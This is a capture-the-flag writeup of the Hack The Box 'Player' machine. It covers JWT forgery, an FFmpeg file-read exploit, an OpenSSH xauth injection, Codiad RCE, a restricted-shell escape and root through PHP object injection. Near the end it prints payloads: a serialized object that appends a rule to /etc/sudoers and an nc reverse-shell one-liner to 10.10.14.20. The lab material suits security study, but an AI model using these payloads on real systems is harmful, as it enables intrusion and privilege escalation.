CTF WriteupsHackthebox Writeups

Hackthebox Player Writeup

hackthebox writeups

In this article you well learn the following:

  • Scanning targets using nmap.
  • Identifying php backup file.
  • Playing with JWT ( Json Web Token ).
  • Exploiting FFmpeg Software.
  • Scan for Vhosts.
  • Exploiting OpenSSH 7.2p1 xauth Command Injection.
  • Identify and exploit Codiad Web Based IDE.
  • Escape Limited Shell.
  • Monitor Processes via Pspy64.
  • Exploiting POI ( PHP Object Injection ).

 

Port Scan:

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11
80/tcp open http Apache httpd 2.4.7
6686/tcp open ssh OpenSSH 7.2 (protocol 2.0)

 

Enumeration:

Firstly, i checked the http port 80 and i got a forbidden page, and I run gobuster tool to bruteforce directorys .

I found /launcher with 301 code , open an application named playBuf.

I checked the feature in the application with Burpsuite .

I found that ( Send ) button make a get request to another page that have JWT and then redirect us to index.html, so I tried to see the JWT with ( https://jwt.io ).

After alot of enumeration I found a backup of this page http://10.10.10.145/launcher/dee8dc8a47256c64630d803a4c40786c.php~, and have the code that generate JWT and decode it.

I start analyzing the php code , they replace the ‘ _ ‘ in key with ‘/‘ and then base64 decode.

As a first step I know what the code do , then there’s a check if the access_code in access variable in cookie match this ‘0E76658526655756207688271159624026011393‘ with redirect us to a new directory , we make a simple php code that change the access_code and encrypt it with the right key.

After running the code I got the new JWT.

I changed the token and send it to dee8dc8a47256c64630d803a4c40786c.php, then redirect me to new directory 7F2dcsSdZo6nj3SNMTQ1/ with new application.

After I make some enumeration I found it’s ffmpeg software ( open-soucre project used for processing audio and video formats ) , there’s SSRF exploit in this software this is good report from hackerone. ** https://hackerone.com/reports/115978 **

After installing the script that generate the .avi file to make LFI (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS) I uploaded the .avi file to the system.

By clicking on “Buffed Media” and downloading the .avi file , and here’s the magic I got passwd for the server.

– I installed a script to bruteforce vhosts make some filter with status code and content length and i found 2 vhosts.

* ruby scan.rb –ip=10.10.10.145 –host=player.htb
* dev.player.htb , staging.player.htb *

 

I found that there are some error messages on some features, after checking all pages and try all features , there’s error message in contact.php

I found two file in the server , I will read it using ssrf exploit (FFmpeg)

* python gen_avi.py file:///var/www/backup/service_config config.avi

I got creds from /var/www/backup/service_config

I tried this credentials into ssh and I got lshell or ( limited shell ).

I searched for exploit OpenSSH 7.2 and I found an exploit.

After running the script I got shell access as user.

I read the fix.php file that i not read it , and I got a new credentials : peter:CQXpm\z)G5D#%S$y=

-After a lot of enumeration and trying this creds in ssh with no success, I found that creds valid on http://dev.player.htb/ , and open for us a new system.

After some search and digging into source code I found what is this:

– I found a word ( codiad ) and I searched about it in google and found Codiad RCE
* https://github.com/WangYihang/Codiad-Remote-Code-Execute-

I tryied it and worked with Peter credsa and I got a shell.

After getting a reverse shell I tried to switch user to telegen, but there’s lshell. So, I searched how to bypass this and I found there’s option with:

* su telegen -s /bin/bash

After an hour i decided to get pspy64 to see the processes and I found there’s cronjob run by root in interesting path :
* python -m SimpleHTTPServer 80
* wget http://10.10.14.20/pspy64

I checked /var/lib/playbuff directory to see what on it .

After that, I saw the buff.php , it’s use serializtion. Good link for this type of attack:

Remote code execution via PHP [Unserialize]


– there’s two way to got root :

  • php object injection.
  • I can switch to www-data and change database connection file to reverse shell : /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php

** Method 1: via POI ( PHP Object Injection )

I edited /etc/sudoers to make user telegen run anything
– telegen ALL=(ALL)ALL
Payload:
echo ‘O:8:”playBuff”:2:{s:7:”logFile”;s:53:”/var/lib/playbuff/../../../../../../../../
etc/sudoers”;s:7:”logData”;s:20:”telegen ALL=(ALL)ALL”;}’ > merge.log
– wait 1 min
– sudo -l

** Method 2: via edit database file

Payload:
echo ‘<?php system(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc 10.10.14.20 9909 >/tmp/f”);?>’ > /var/www/html/launcher/
dee8dc8a47256c64630d803a4c40786g.php
– nc -lvp 9909
– wait 1 min

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
Close